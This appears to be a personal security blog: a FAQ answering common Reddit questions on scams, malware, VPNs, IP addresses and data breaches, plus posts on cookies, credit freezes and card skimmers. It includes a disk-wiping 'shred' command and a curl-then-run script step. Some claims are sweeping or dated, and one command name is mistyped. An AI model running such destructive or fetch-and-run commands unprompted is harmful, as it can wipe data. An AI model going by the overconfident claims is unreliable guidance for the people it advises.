Sunday, September 29, 2024

Cybersecurity FAQ

 


I regularly contribute to a subreddit named Cybersecurity_help and a few other subreddit groups on Reddit.com, where I help answer questions on a wide range of topics, including online safety, identity theft, scams, extortion, malware, and viruses. often encounter repeated questions in these forums, so I decided to consolidate all the frequently asked questions (FAQs) in one place. This way, cybercrime victims seeking help or advice can find answers and support for many of the frequently asked questions here. While this isn’t a comprehensive list, it covers many of the questions I’ve seen posted in these forums. This will be a living blog to which I will continually add as I find more of these repeated questions

FAQs

1. Someone on the internet says they know my IP address, I am scared.

There is a common misconception among many internet users that knowing their IP address somehow gives someone the power to “hack” them. This myth has been spread by non-technical users, social media, and news outlets, among others. The fact is, every website you visit knows your IP address because it needs this information to send content (text, images, etc.) to your browser so that it can be displayed on your screen. This is how everything on the internet works, not just websites. In addition to your IP address, your internet browser provides much more information to the websites you visit than you may realize. Visit this link (https://myip.selvansoft.com) to see some (not all) of the details your browser shares with websites you visit. An IP address is just a number; only your Internet Service Provider (ISP) knows that it was assigned to you, and they will not disclose your information unless they receive a request from law enforcement accompanied by a proper court order. Being afraid that someone knows your IP address is like worrying that people saw your car’s license plate number while you were driving around the city. Unless you’ve committed a crime and are fleeing from law enforcement, this isn’t a problem. Similarly, if you haven’t done anything unlawful online, you have nothing to worry about if someone claims they have your IP address. They can’t do anything with it.

2. I got an email mentioning Pegasus, is this real?

The Pegasus email scam is one of the most popular scams in circulation, and yes, it is 100% a scam. While it is true that Pegasus is a sophisticated spyware developed by the Israeli cyber-arms company NSO Group, it is used for surveillance purposes, often by government agencies and law enforcement for espionage and counter-espionage activities. Ordinary citizens are not the target. The idea behind this scam email is to use scare tactics with bits and pieces of information like your address, name, email, phone number, a picture of your house from Google Maps etc. all of which are publicly available, to make you send them money. Whatever you do, never send money. Just delete and block this email as spam and move on with your life. No one is going to come after you.

3. Does VPN keep me safe online?

First, a VPN (Virtual Private Network) is a privacy tool that primarily focuses on your privacy by masking your IP address and encrypting your internet traffic. It is not a security tool. While privacy and security do overlap, they are distinct concepts. Privacy is about protecting your personal information and activities from being observed, while security involves protecting your data and device from unauthorized access and threats. That said, if you think running a VPN will protect you from all compromises, you are misinformed. You could run a VPN and still visit a malware site, install pirated software, or use a compromised network, and your device would be compromised just like anyone not using a VPN. Moreover, pretty much all data communication today is done in encrypted form. As long as you are using the HTTPS protocol, you are relatively safe, and you don’t necessarily need a VPN. See additional details at the blog (https://blog.selvansoft.com/2024/06/vpn-myth-vs-reality.html).

4. My name, address, phone are listed on a website, what do I do?

While this is a problem, the short answer is that there isn’t much you can do other than ask them to remove it, which is not an easy task. You can follow this blog (https://blog.selvansoft.com/2022/07/how-much-of-your-info-is-freely.html) for guidance or try a paid service like Incogni or Optery. The reality is that many data aggregator sites collect your publicly available data, such as your name, address, and phone number, and sell it legally to anyone online. This is a big business, and these data aggregator sites are popping up all over and are here to stay.

5. I sent intimate photos to someone online, and now they are threatening to share them with my contacts if I don’t send them money. I am scared. What should I do?

There is nothing you can do at this point but block and ignore them. Most importantly, never send any money; if you do, that will only make them ask for more, and it will never stop. Likely, the scammer will move on to the next victim. However, be prepared for the possibility that they might get angry and send your pictures to your contacts if they have access to them. While it’s very unlikely this would happen, as they could be scamming someone else instead of wasting time on you, there’s a chance they might persist if they believe you’re a high-value target with the potential for a significant payout. In that case, they would likely continue with the charade. I hope you learned your lesson.

6. I see a lot of attempted logins on my Microsoft account. How do I stop it?

Though it may sound strange, the short answer is, it is normal these days to see multiple attempts daily or even hourly, as shown in the screenshot below.

With so many data breaches in the last decade or so, pretty much everyone’s email is leaked. You can check your email in HIBP (https://haveibeenpwned.com/). Scammers use automated scripts to attempt to login using your email with an attack technique called credential stuffing (i.e. using leaked passwords) and it will not stop. Just ignore it as long as you have your account well protected with unique and strong password, MFA with an authenticator app or better (hardware keys) or passwordless login etc, you have nothing to worry about. There is a way you can minimize these attempts by eliminating the number of email aliases you have that has login ability. The more you have, obviously the number of attempts will multiply by the alias count. You can restrict which alias can log in and remove login ability to others would reduce the attempts and lower the risk. Follow the link (https://account.live.com/SignInPreferences) when you are logged into your Microsoft account and check if you have multiple aliases with login privilege. Finally, by creating a brand-new alias and allowing only that alias login access you can stop these attempts altogether … well, until your new alias is leaked down the road 😁.

7. Is using public Wi-Fi safe? 

Public WiFi (airport, hotel, coffee shop, etc.), comes with inherent security risks. While complete safety is impossible to achieve, you can significantly improve your online security by following good cyber hygiene best practices. Avoid sensitive transactions like logging into bank accounts, credit card portals, or other financial platforms while connected. If the website you visit does not offer HTTPS transport, do not visit it. Make a habit of only visiting sites that offer HTTPS transport, even on private networks. Enable your firewall; most operating systems come equipped with a built-in firewall, so enable it and block all inbound connections. Keeping your firewall enabled is a simple yet effective way to bolster your security on any network, public or private. Optionally, you can run a VPN for an additional layer of protection. However, it’s not strictly necessary. Contrary to popular belief, a VPN doesn’t make you invincible. Here is a blog (https://blog.selvansoft.com/2024/06/vpn-myth-vs-reality.html) that outlines what a VPN is and is not, if you’re interested in reading it.

8. I opened a sketchy PDF file. Is my computer compromised?

While there are documented cases of malicious executable code being embedded in PDF files, malware cannot do anything on its own. It relies on exploiting vulnerabilities in your PDF reader software to run. Therefore, the security of your system depends on the PDF reader you use. If you keep your operating system and applications updated with the latest security patches, you should be fine. For example, if you opened the PDF with your browser, which is typically the case, as long as your browser is updated with all the recent updates, you should be fine even if the PDF is infected with malware. Finally, if you only downloaded the PDF and did not open it, it should not cause any damage whatsoever. Just delete the PDF and move on.

9. I was part of a data breach; how do I protect myself from identity theft? 

First, you are not alone. Given the numerous major data breaches in recent years, many people’s SSNs are unfortunately exposed. For instance, the AT&T breach in 2022 reportedly compromised the SSNs of between 50-100 million customers. Additionally, the recent National Public Data leak included a vast number of individuals. To prevent identity theft, you should freeze your credit reports. This restricts access to your credit information, making it difficult for criminals to open new accounts in your name. You can easily freeze and unfreeze your credit as needed, such as when applying for a loan or credit card. Here’s a simple blog (https://blog.selvansoft.com/2023/05/howto-credit-freeze.html) outlining how to freeze your credit.

10. I changed my password and enabled MFA, but an attacker still accessed my account. How?

It is likely that you have info-stealing malware on your device, which exfiltrated your authenticated session token. Alternatively, you may have visited a malware-laced site that ran a malicious script to read your authenticated session token. Either way, a remote attacker has your authenticated session token. This is a form of attack called session hijacking. Keep in mind that strong passwords, MFA, and hardware keys are irrelevant against session hijacking attacks, as the attacker can use the valid session token to log in as you until the session token expires, which can be hours, days, or even weeks, depending on how the session management is implemented on the website. To remove the access, you need to invalidate your sessions by logging out of all your accounts on all your devices. In case you find your device is infected with a virus or malware, follow FAQ #11 below to remove it.

11. My computer is infected with malware. How did it happen, and how do I recover?

The root cause could be anything from installing pirated software or cheat codes to clicking on malicious links or visiting compromised websites (inadvertently or intentionally) and more. Run a full scan of your device with a malware scanner like Malwarebytes and/or a good VirusScan tool to remove/clean the infection. In most cases, that is all you need to do. However, while most virus/malware removal tools do a good job of removing infections, they may not be effective if you are infected with a persistent rootkit. In that case, you may have to do a complete wipe (wipe the hard drive, including the EFI partition) and reinstall the OS. This is quite different from the typical “Windows reset/reinstall” step most people are familiar with, which doesn’t remove things hiding in partitions outside the reach of a standard OS reset/reinstall. An explanation of how to do that is outside the scope of this answer, but you can consult an expert to help you accomplish it, or you can do it yourself by following the FAQ #13 below. Finally, to prevent future attacks, be cautious about the websites you visit, avoid clicking on random links, and refrain from downloading pirated software or crack codes, etc.

12. How do I backup my Google Authenticator secrets?

As a cybersecurity professional and practitioner, I would not advocate syncing authenticator secrets to any form of cloud storage; instead, keep them local. MFA is your second layer of protection and having the secrets for generating OTPs for MFA reside in the cloud makes you vulnerable in the event of future data leaks. Follow my instructions below to detach Authenticator from Google cloud sync and take responsibility for guarding your secrets under your control. 

First, export all your secrets. Google Authenticator allows you export all secrets to a giant QR code. Save this QR code image to your local drive and follow the steps.

  1. Enable google sync.
  2. Now delete all the secrets.
  3. Let google sync empty Authenticator.
  4. Now, disable google sync.
  5. Import everything back from the giant QR code you saved above.
  6. Keep the QR code in a safe place or better yet, print a paper copy to store it.

Ultimately, Authenticator cloud syncing boils down to the "convenience over security" argument. In the digital age, online security is your lifeline. Therefore, I generally advise everyone to never prioritize convenience over security.

13. How do I completely wipe my hard drive to remove a rootkit or to dispose of it with no sensitive information?

Contrary to popular belief, deleting partitions and formatting a drive does not truly wipe data. While it renders the data inaccessible to the operating system, the actual data persists on the drive until overwritten by new information. Therefore, if your system was compromised with a rootkit (commonly hides in the EFI partition), repartitioning or formating does not guarantee its removal. To achieve a completely clean drive, every byte in every sector must be overwritten with zeros (or random byte) before partitioning and formatting to install fresh new OS. While numerous methods exist for wiping a drive clean, here's a straightforward approach if you know basic command-line skills in Linux.

First, download a Linux distribution (e.g., Ubuntu) to a USB drive, then shut down your machine and boot from it (adjust BIOS settings to prioritize USB boot). Once in Linux, open a terminal and type "sudo su" to gain root privileges. Identify the device file corresponding to your Windows hard drive/SSD. This will typically resemble /dev/sdc or /dev/sdd. For reference, the screenshot below shows a Windows hard drive at /dev/sdi. Ignore other details in the screenshot as they pertain to a different context.


You can determine your Windows drive's device file by running "fsdisk -l" without arguments and examining the output. Once you identify your windows drive device file, execute the following command, replacing "/dev/sdi" with your actual device file. 

shred -vf -n1 /dev/sdi 

Be prepared for a lengthy process (potentially hours) depending on the hard drive or SSD's size. Note: If you are disposing the hard drive, remove the -n1 argument to shred. It would not be a bad idea to perform a full scan of all the data you have backed up from the infected drive. In fact, it would be quite easy to do so in the step mentioned above while operating under Linux. You can install ClamAV (https://www.clamav.net/) using this command "apt install clamav". Then, identify the mount point of your USB drive that contains your backup data and run clamscan on it. This can be done simultaneously while you are wiping your hard drive as described in the previous step. Once your drive is completely wiped and your backup data has been scanned, install a fresh copy of Windows from read-only media. At this point, your Windows installation should be as clean as a whistle.

14. I run Minecraft server for my friends and notice random IPs are attempting to connect to my machine. What do I do to protect my machine?

Running a service publicly on your machine can attract attackers worldwide looking for vulnerable services to exploit. Although your firewall may block attempts to connect, you will soon notice the number of attempts will continue to grow. Eventually, they may succeed if they manage to exploit any known vulnerabilities in the service. It is bound to happen; it is not a question of if, but when. Keep in mind that all services have vulnerabilities (both known and zero-day), and Minecraft has its fair share of vulnerabilities. With that said, if you must run the gaming server while accepting the risks outlined above, you might consider disabling UPnP if it is enabled on your router. In my professional opinion, this setting poses a significant security risk as it automatically opens ports on your network, potentially allowing unauthorized access. I recommend disabling UPnP to enhance your network’s security. If you require specific ports open for gaming, you can manually forward them instead of relying on UPnP.

15. An attacker hacked everything (laptop, phone, router, network etc.) simultaneously, how do I recover?

The scenario you are describing, i.e., a hacker installing malware on all of your devices simultaneously, is highly unlikely. It is improbable that someone (or something) could infect a heterogeneous collection of devices across different architectures and operating systems with just a single piece of malware, virus, or rootkit. Such an all-in-one compromise is simply not feasible in the real world and is more likely to occur only in movies


Sunday, June 30, 2024

VPN Myth vs. Reality

VPN (Virtual Private Network) is one of the most misunderstood technologies among non-technical people. Actually, I have come across even many technical people with complete and total misunderstanding of what VPN is and is not. These days the term VPN is touted as a solution for all things security and is advertised by VPN vendors as the one-size-fits-all security solution. This is a misconception and a false sense of security; VPN solution is not a magic shield for online safety. Let’s take a look at what VPN is and is not.

What VPN is?
Simply put, VPN creates an encrypted network tunnel between your device (laptop, phone etc.) and a VPN server. All your data pass through the tunnel in an encrypted form to the VPN server to make it harder for anyone to track your online activity and most importantly where you are located. The websites you visit will only see the VPN server’s IP address not your device’s IP address. It is this aspect that allows journalists, activists and the like to hide from governments that watch everything they do. Similarly, cyber criminals can leverage this to mask their identity. It also allows people who want to get access to services (for example: video streaming) that are "geo-fenced" i.e. not allowed from certain countries due to regulation etc. Finally, corporations use VPN to prevent sensitive corporate data travelling from employee laptop via public network and to provide access to company resources. That is pretty much VPN is in a nutshell.

What VPN is not?
VPN does not protect you from cybercriminals or viruses or trojan or spam or adware or identity theft etc. Remember I mentioned above that VPN would prevent anyone from tracking your online activity? Well, it is not entirely true. Logged-in accounts and browsing habits can still be tracked (see my earlier blog on 3rd party cookie) by websites you visit. As mentioned earlier VPN isn't antivirus! So even with VPN running, you still need separate protection from malware, virus, trojan etc. Also, there is no guarantee on complete safety, as leaks can happen at the VPN server and some VPN providers log your activity and hand over to authorities when requested depending on local and international laws.

Do you need VPN?
The short answer is no, unless you have a specific reason to hide your online activity. For most everyday users, this isn't necessary. With the widespread adoption of https protocol, which encrypts data between your browser and the websites you visit, VPN adds little value for general online safety. In fact, using a VPN can significantly reduce your bandwidth despite the vendor’s claims of a "fast" solution. About 15 years ago, when the https protocol was not widely implemented, using a VPN was the only way to encrypt data from prying eyes -- up to the point where the VPN tunnel ended. However, this is no longer the case today, as all websites are protected by end-to-end secure connectivity.

Ultimately, whether you use a VPN or not, inherent risks are associated with using public Wi-Fi, which is beyond the scope of this blog. Unless your device runs on a secure operating system, such as Linux or Apple’s macOS, there is always a risk of compromise on public networks — even with an active VPN. It’s possible for someone sitting nearby in a coffee shop to hack into your device.


Monday, May 6, 2024

Disable third-party cookie

What is third-party cookie?
Have you ever wondered why websites suddenly start serving you ads for specific products everywhere you browse? For example, after you visit an eyewear website or search for glasses on Amazon, you'll notice you get a lot of ads related to eyeglasses or sunglasses. This is done using third-party cookies stored on your device which are primarily used for targeted advertising. 

Why do you need to disable third-party cookie?
They track your browsing activity across different websites, building a profile of your interests to be used by advertisers to serve you ads that are more likely to be relevant to you. As such, they raise significant privacy concerns because they allow companies to track your online movements across multiple websites, building a detailed profile without your full awareness.

How to disable third-party cookie?
While Firefox and Safari browsers have blocked third-party cookies by default for quite some time, Google Chrome, on the other hand, had a deadline to phase out third-party cookies by the end of 2024. However, Google recently announced that it is delaying the phase-out of third-party cookies beyond 2024 (https://searchengineland.com/google-third-party-cookie-phase-out-third-delay-439864)

If you are a Chrome browser user like me, you don’t need to wait for google to phase-out third-party cookie. You can actually disable it in Chrome browser by typing "chrome://settings/cookies" on the address bar and selecting "Block third-party cookies." I've had this setting enabled since its introduction and haven't encountered any significant website functionality issues. Once you do that, your browser address bar will show a blocked icon for every site you visit that uses third-party cookie as shown below … 

More interestingly, the following is a screenshot of my login session with my bank (a major US bank) website. As you can see the bank’s webpage code indeed has embedded content from facebook.com. However, since the third-party cookies are blocked, it will not be able to read which is what I want. As a matter of fact, this is indeed how Facebook learned about my banking activity which I have documented in detail in a blog post last year. You can read it at  https://blog.selvansoft.com/2023/06/facebook-knows-you-way-more-than-you.html to learn how the information was gathered.

Ideally, I’d like to block facebook.com here all together (i.e. disable it like I did with public.cobrowse.oraclecloud.com). However, it is not very practical because if I do that, I need login & authenticate to facebook.com every single time which is painful, so I let it be there at least I know they are not going to learn my banking activity for sure which is good enough.

Finally on a related cookie topic, I learned an interesting fact from a tech podcast with Steve Gibson (grc.com) on the annoying cookie permission pop-ups (GDPR compliance) we see on every website these days. It turns out that about 65% of the websites ignore what you choose and place tracking cookies anyway. You can view/hear the relevant section of the podcast here and here.

Tuesday, April 2, 2024

Free 1TB cloud storage?


Who says there is no free lunch? I saw this ad from TeraBox (terabox.com) for a free/permanent 1TB cloud storage which I thought was too good to be true. So, I created a free account and attempted to upload a huge 32GB file, but it failed saying for free tier, the largest file you are allowed to upload is 4GB. Ok fair enough, so I chopped the files into 4GB pieces and tried again. To my surprise, the free tier account uploaded all of them without any issue (see screenshot below), but it took longer since they do throttle upload speed for free tier which is totally understandable.

 

In addition to throttled down "upload speed", the "download speed" is also heavily throttled down as well, so it would take longer to download your file. But if you are only interested in storing your data for backup it doesn’t really matter how long it takes to download especially considering its free service. If you really need all your data downloaded fast, you can always signup for paid version $3.49/month (at the time of this writing), download everything and switch back to free tier 😃

Bottomline is, I would not recommend this as your only, primary cloud backup but certainly a great option as a secondary storage … its free anyways!

If you decided to use this service, do not download their phone app, or native app which are full of adds for free tier. Just go to terabox.com website and signup a free account on your laptop/desktop and upload/download files using the website on your laptop/desktop.


Thursday, January 18, 2024

Is your computer compromised?


Easy way to check if your computer is/was compromised now or in the past

With the recent addition of Naz.API dataset (a massive collection of over 1 billion stolen username and passwords) to HIBP service ("Have I Been Pwned" - a service by troyhunt.com), it is now very easy to check if your computer is compromised by information stealing malware now or in the past. 

Go to the HIBP service at https://haveibeenpwned.com and enter your e-mail (don’t worry, it is 100% safe) and check the search results. The results may span several pages, so make sure to scroll down and check all the breaches your email is listed as compromised. Keep in mind that it is not at all unusual to see your email show up on multiple breaches. For example, see the screenshot below of my own email search.


As you scroll through the list, check if your email is listed for Naz.API. If your email was one of the unfortunate one to be included in the Naz.API list, it is a clear indication that your computer is now or in the past was compromised and information was stolen. The very least you can do is to make sure your current password is not included in the list. There are couple of ways you can check. I know some password managers like 1Password for example can check all your passwords against HIBP database. If you don’t use any tools that support checking your password in HIBP database you are welcome to use my php script at my GitHub repo below which does the same thing, the only caveat is that it checks one password at a time against HIBP database, so you have to repeat that for all your passwords.

How to run: If you are on a Mac or Linux, you can run the script directly with the two commands as shown below ... If you are windows, you have to install php, curl etc first which is beyond the scope of this blog.

curl -s https://raw.githubusercontent.com/aselvan/scripts/master/security/pwned_password.php -o /tmp/pwned_password.php
php /tmp/pwned_password.php

If you are unfortunate to have your password listed in HIBP as per the tools (1Password or my script or any others that check your password against HIBP), and if it is any of your current passwords, change it ASAP and enable 2F if that’s not already in place. If your current password is not found, it means an old password you used in the past was compromised. Still, it is a good idea to change all your passwords ASAP.

If you use more than one email address now or in the past, repeat this for each e-mail.

For further details can be found at the following links


Wednesday, January 3, 2024

New Year, New Password!


As part of your new year’s resolution, it is a good idea to get your online security a fresh start in 2024. With cyber threats becoming an unfortunate norm these days, it's time to enhance your cyber hygiene to protect yourself from becoming a cybercrime victim this year. Change all your online account passwords, especially financial/banking, shopping, social media accounts. The following is a list of things to consider.

  • Change your passwords (also change username if permitted)
  • Enable password-less logins if available.
  • If you don’t have 2F enabled, make sure to enable it.
  • If the site supports stronger 2-factor mechanisms, like Authenticator app or better yet hardware key based, use that instead of SMS based 2-factor; While SMS based is better than just password alone, it is prone to attacks like SIM swap scams 
  • Validate your recovery mechanisms.
    • Reset recovery app keys (if any)
    • Validate recovery e-mail.
    • Reset onetime login codes.
  • Last but not least, invalidate all logins (i.e. log out from all devices and log back in). Though this step may be enforced by the password change, some sites don’t enforce it.

Remember, cyber hygiene is like flossing, not the most glamorous, but essential for long-term digital health. This year, make your online security a resolution you actually stick to. Have a safe 2024 and beyond!


Wednesday, July 12, 2023

T-Mobile SIM swap protection

Many of us know or heard about how easy it is for cyber criminals to circumvent the SMS based 2FA authentication. While SIM swap scams are around for a while but according to FBI, it is currently on the rise. Ideally, you should use the authenticator app or better yet, hardware keys for 2FA but if the website only offers SMS based 2FA you have no choice but to use that. Unfortunately, lot of websites including some financial/banking websites offer only SMS based 2FA. If you are a T-Mobile customer, you can secure your SMS based authentication slightly better with T-Mobile SIM swap protection feature. I don’t know how well it actually protects but it is better than nothing. Log into your T-Mobile account and navigate to Account/Profile/Privacy & Notification/SIM protection to toggle it on as shown on the screenshot below. For convenience, the link below will take you to this setting directly if you are already logged into your T-Mobile account. 

https://www.t-mobile.com/account/profile/fraud-block/simswap


Related Link:

https://www.wirefly.com/news/fcc-proposes-new-rules-stop-sim-swap-attacks


Saturday, July 1, 2023

Three Simple Online Banking Safety Tips


Here are three simple steps you can take while doing online banking to minimize your chances of becoming a victim. As the title says, these steps are simple and does not take much time or effort to follow.

  1. Before login to your banking website for financial transactions or to even review your bank statement etc., close all tabs in your browser. If you are paranoid, temporarily disable any browser plugins you may have installed which you can turn on later.
  2. When you are logged into your banking website, do not do anything else like google search, Facebook, Instagram, or any other browsing specifically, read emails or worse, click on a link your buddy sent you to "check it out". You can do all that after step#3 below.
  3. Once you are done with your online banking business, make sure to log off. Many secure banking web sites these days do protect you by logging you off automatically. However, don’t rely on them because there are still some stupid online banking web sites that don’t properly log you out in a reasonable time or worse, don't do anything.

Simple Cyber Hygiene Practice


Here is some advice on simple cyber hygiene practices to protect yourself online. You really don't have to take extreme steps to bulletproof your online accounts because if a persistent and determined cyber criminals decided to target you (i.e., spear phishing), there is very little you can do to stop them especially if you are a high value target. Luckily most of us don't fall into that category unless you are dumb enough to divulge your personal info by posting on social media that makes you a target. However, with a bit of effort on your part, you can make it slightly harder for cybercriminals to scam you so they will move on to easy targets. 

"You don’t have to run faster than the bear to get away. You just have to run faster than the guy next to you."

Trust me, there are still stupid people out there who use "123456" as password (BTW: "123456" is one of the top 10 passwords in 2022 including "password") feeding this fast growing $8 trillion cybercrime business. 

Now, how do you make it "slightly harder"? The answer is, as you may have heard many times, don't just rely on user/password alone even if you have a strong password like "~ti0ah5%#W". Though a strong password is the first step in making it harder, it does not always protect you in all cases as there are ways criminals find a way to gain access to your stuff. So, ensure that you enable 2FA (two factor authentication) wherever it is offered. If multiple methods are provided for 2FA like SMS & authenticator, choose the latter as SMS based 2FA is a false sense of security though it is better than just user/password.

Friday, June 2, 2023

Facebook knows you way more than you think!

We all know that Facebook collects data on all of us. They manage to do that with different ways including via 3rd-party web browser cookies; an explanation of 3rd-party cookies goes beyond the scope of this blog but you can read about it here if you are interested to know more. While 3rd-party cookies are slowly phased out, the alternative i.e. FLoC proposed by Google, as per many privacy advocates, is even worse ... so for now, just assume Facebook and other platforms will always have a way to spy on you.

While there are ways to restrict what Facebook collects (follow steps at end of this blog), there is not a whole lot you can do to make them stop other than just deleting your Facebook account. The reason is, Facebook generates substantially all of its revenue by selling ads, so they have to monitor your online activity to slap you with targeted ads and curated content based on your web browsing behavior i.e., the sites you visit, shop, like etc. At the end of the day, Facebook knowing that I have T-Mobile wireless, or shop at Amazon or browse Reddit etc, is not a big deal for me, I just don't care. However, when I looked at what websites are sharing with Facebook, specifically, financial institution that I do business with, I was very concerned. My financial institution (will not mention their name here) shared with Facebook something related to my activity which is scarry, see below ...


It is unclear to me what they shared since I don't have the details other than Facebook telling me they did. I have the habit of clearing all cookies on banking and financial websites frequently, so unfortunately, I can no longer access this specific cookie in my browser to see the content of what all was shared with Facebook! However, based on the name of activity shared i.e., "COMPLETE_REGISTRATION", I can only assume it is not something I would like them to share, whatever it is. If it was just "PAGE_VIEW" like all other sites, I would be ok with it even then, why would Facebook need to know what bank website I visit? The only thing I remember is opening a new account, transferring money on those 2 days at that exact time mentioned which caused my concern. Why on earth Facebook needs this information? Just to give some perspective, this is just one specific instance of a website I have discussed above, there could be crap ton of them we visit every day sharing all kinds of stuff w/ Facebook 😮.  

Finally, if you got this far, you could follow the steps below to tell Facebook to quit doing this, at least for now, until they figure out new ways of profiting on you 😃

Update: (May 22, 2024): Since many page links and interfaces have changed since this original post back in June 2022, I updated the details below as of today. 

While logged in Facebook ...

  1. Navigate to https://www.facebook.com/off_facebook_activity
  2. Click "Manage future activity"
  3. Click on "Disconnect future activity.” 

This will also clear all the stored activity, so you don't need to clear that. For visual reference, The screenshots for steps 2 and 3 are below. 




Android Battery Drain

 

If your android phone runs out of battery sooner than you expected, you are not alone. The culprits are power hungry, and poorly designed smartphone apps you may have installed – trust me, there are lot of them including popular apps many of us use on a daily basis. To give an example, “Withings Health Mate” app that I use tracks weight from Withings Digital Scale and for some reason it adds a background task to sync the weight from the scale to cloud continually. This is insane ... why on earth anyone needs their weight to continually sync to cloud? A better design would be to sync to cloud whenever you open the app to check your weight history; there is absolutely no need to sync body weight continually especially it involves using your precious battery power. To make matters worse, some of them go totally nuts and do some crazy stuff. See my findings on fitbit at the link https://link.selvansoft.com/crazy-fitbit

Anyways, here is the list of top 10 apps that drain battery a lot. 

  1. Fitbit
  2. Uber
  3. Skype
  4. Facebook
  5. Airbnb
  6. Instagram
  7. Tinder
  8. Bumble
  9. Snapchat
  10. WhatsApp

In my opinion, any phone can and should last a full day with heavy usage and two days on normal usage without having charge but if you have one or more of these installed, it is highly unlikely your phone battery will last all day long.

Solution:

The good news is, there is a way to limit the use of battery and extend your phones ability to last a whole day or two. For example, my phone battery lasts 2 full days on regular use. If you happened to run one of these apps above, just follow the video at link below to adjust the settings and enjoy longer battery charge!

https://selvansoft.com/public/videos/battery_optimize.mp4

Note: Some apps may not function properly while running in the background with this change, but most apps should work just fine. If you have any of them installed, just open each of them once so they will be listed on the recent list so you can easily find them, otherwise just search all the installed apps to find them to change the setting.

Finally, if you rarely use any of these power hogs, just uninstall them and install it back when you find the need to use. Another option is to enable “Google Play Instant” to run apps w/ out installing (note: Not all apps support this function). Go to your Google Play Store app Settings/General/Google Play Instant and enable it as shown in the screenshot.




Thursday, May 25, 2023

How to protect yourself from Card Skimmers

Before I go into steps to protect yourself from card skimmers, it is important to understand the various protocols used in POS (point of sale) devices to read your credit/debit cards. There are 4 types and they are --- swipe (magnetic strip), chip (chip in card), tap (RFID) and smartphone (NFC). I won’t go into the details on each of these, but it is sufficient to be aware that there are multiple technologies involved in POS transactions. Now, here are different ways to prevent or at least lower your chances of becoming a victim of card skimming listed in the order of most effective to least effective.

  1. Use your 'smartphone' to pay (Google Pay, Apple Pay) wherever you can. How to get this setup is outside of the scope but it is very easy. This is the strongest protection you get today, and it is extremely difficult (if not impossible) for criminals to scam you. Most POS devices accept these today although if you live in US (lagging behind the world) it is not uncommon to see vendors using ancient devices that does not support smartphone pay.
  2. Use 'chip+pin' if your card and the POS device supports, this is the second-best way. If you live outside of US like Europe, even in India, you are golden because it is the standard for POS devices for many years and you are required to use pin to do transaction. Every time I was on a business trip to India, I always find myself arguing with waiter at restaurants “hey, I don’t have a pin” 😄. If you live in US, it sucks since chip+pin is not mandated for whatever reason.
  3. Use 'chip' if your card and the POS device supports. Most credit card/banks these days issue cards with chip but unfortunately in US, they also include the magnetic strip to cover the lazy ass vendors who still use archaic magnetic swipe. This pretty much negates the benefit of chip as scamming devices can still read your magnetic strip. So, if you live in US, what I’d recommend is to scratch the magstripe on purpose (I did that on all my cards). Use a sharp knife or steel wool to scratch the magstripe to a point it can’t work. Keep one card with magstripe in case the vendor says, “we don’t have chip reader you have to swipe”. Trust me these guys won’t change unless they are mandated by law to switch to modern POS at state/federal level.
  4. Use ‘tap’ if the POS device and your card supports it. If you see this symbol on the back of your card, then it is enabled for RFID. Again, US lags on this protocol as well. While this is the most convenient way to make purchase, there is a huge security hole in this method which enables most sophisticated attacks which I won’t go into detail but there are things you can do to avoid them i.e., use an RFID blocker (you can buy them at amazon for $2 a piece) and place it in your wallet/purse along with your credit/debit card equipped with this technology. I use these if you need a recommendation https://link.selvansoft.com/1307688f
  5. Use 'check' which of course has many problems of its own but it may be slightly better than the last one below.
  6. Lastly, if none of the above options available to you, you have no choice but to use magstripe/swipe. You might want to spend few seconds to look for signs of tampering on the POS device. See the picture at top of this blog for signs to look for. Obviously, you won’t have lot of time besides, you may annoy other customers behind you if you are spending too much time poking around the device 😄

Finally, you can and should setup text alerts when your card is charged even for a $1. Almost all bank/credit card institutions provide the feature to TXT. The only annoying thing is getting TXT for everything you do on your card, but it is better than being a victim. 

My text alerts look like this (see screenshot below).  Notice it says “card ending in xxxx was not present” that has multiple meaning but, in this case, it means these transactions are done without card i.e., done with google pay which I use everywhere it is accepted and it’s the most secure way today to pay at POS. Period.


Tuesday, May 23, 2023

ProtonVPN - fast & free

ProtonVPN

Not sure any of you are aware of Proton Mail which is a fully secure email service and has been around for a while. I signed up for their free tier email service a while back but never used it since I don’t want to pay for yet another cloud space and the free tier space of 500 MB is not much for daily use.

Anyway, I know they had VPN for free as well but never tried it until recently and I am blown away by the speed --- very low overhead compared to different VPN service I have used. Granted it is wireguard, a modern successor of VPN but still, literally I get same speed as provided by my ISP. First, I could not believe and started measuring speed with every speed test tool that is out there and they all came back with more or less same and speed which is roughly same as what I get with my ISP  (see screenshot) without VPN layer. At this point, there is absolutely no reason to not use them permanently… and it's Free!



How to get ProtonVPN

Head out to https://proton.me and sign-up for free account and you get encrypted mail service and 1 VPN connection free. Wireguard is pretty simple to use, all you have to do is install wireguard (https://www.wireguard.com/install/ ) and get the credentials/keys from ProtonVPN and off you go. 


How to run wireguard (MacOS or Linux)

After wireguard is installed, follow the simple steps shown in screenshot below to start/stop wireguard. The screenshot is on macOS but it should be same in Linux possibly on windows under powershell as well. The third argument is the name of your wireguard configuration file without the '.conf' extension. In my case it is lion.conf. This is the configuration file you downloaded from the ProtonVPN and it should be copied to /usr/local/etc/wireguard/ on MacOS, or /etc/wiregaurd on Linux.

Wednesday, April 5, 2023

HOWTO: Credit Freeze

Data breach incidents are very common these days. In-spite of all the efforts & money spent by organizations on robust cyber security measures to protect themselves, data breaches continue to occur. With countless sensitive records compromised, it serves as a stark reminder that no organization or individual is immune to cyber threats and as an individual, there is nothing you can do to stop. However, there is one thing you can do to protect your identity and personal data by adding a credit freeze on demand or forever. 

As a matter of fact, I don’t see a need for your credit report to be in “unlocked” status unless you apply for loan, bank account, credit card etc. which you don’t do every day. So, why does it need to be in “unlocked” status? When you need it, you can, with a click of a button (at most bureaus) unlock your credit, get your business done and lock it back. 

I have listed below all you need (link/phone/address etc) to place a “free” (yes free) credit freeze to avoid becoming a victim of identity theft, fraud and scam that could potentially wipe your hard-earned money and ruin your financial reputation, possibly forever!

EQUIFAX:

Online: https://my.equifax.com/membercenter
By phone: 800-685-1111
By Mail: Equifax Security Freeze, P.O. Box 105788, Atlanta, Georgia 30348-5788
Online Account:
Terminology: Freeze
How To Lock: Home and select Freeze on the side bar

EXPERIAN:

Online: https://www.experian.com/freeze
By phone: 888-397-3742
By Mail: Experian Security Freeze, P.O. Box 9554, Allen, TX 75013
Online Account:
Terminology: Security Freeze
How to Lock: Experian is sneaky & goes out of the way to hide the free service pushing customers to pay for the “File Lock” (a paid service). Use the direct link below to get to the ‘free’ option.

TRANSUNION:

Online: https://service.transunion.com/dss/
By Phone: 888-909-8872
